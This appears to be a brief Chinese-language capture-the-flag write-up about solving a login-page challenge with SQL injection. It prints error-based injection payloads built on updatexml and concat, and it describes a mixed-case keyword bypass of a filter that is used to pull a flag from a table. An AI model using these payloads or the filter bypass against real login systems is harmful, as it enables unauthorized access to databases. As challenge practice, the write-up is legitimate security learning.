打开之后什么都没有,还以为是网站崩了呢,返回题目抽了一眼发现让访问/login.php/user.php
没有头绪,url传参更不可能,于是上bp抓包爆破了一下,想走捷径,发现也不行,还是老老实实
的注入吧!
提示我们在url后面加?tips=1
构造我们的payload
name=1'and updatexml(1,concat(0x7e,(select 1 from dual)),1) -- 1&pass=1231321
提示我们sql语句有问题,应该是过滤了什么,尝试一下
大小写绕过,发现管用,有回显,然后接着去注入
SELECT 1 FROM DUAL,这句话的意思是:从DUAL这张表中输出一个常量1
第二天醒了 换一种方法
name=1'and updatexml(1,concat(0x7e,(sElEct flag from fl4g)),1) -- 1&pass=1' and 1=2 -- 1
updatexml(1,concat(0x7e,(),0x7e),1)